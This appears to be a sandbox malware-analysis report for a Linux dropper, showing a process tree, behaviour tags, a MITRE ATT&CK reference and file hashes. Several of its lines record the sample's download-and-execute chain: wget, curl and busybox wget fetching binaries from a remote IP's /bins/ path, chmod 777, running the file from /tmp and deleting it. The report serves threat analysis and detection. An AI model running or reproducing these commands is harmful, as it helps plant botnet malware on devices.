/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:880
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:886
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:890
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97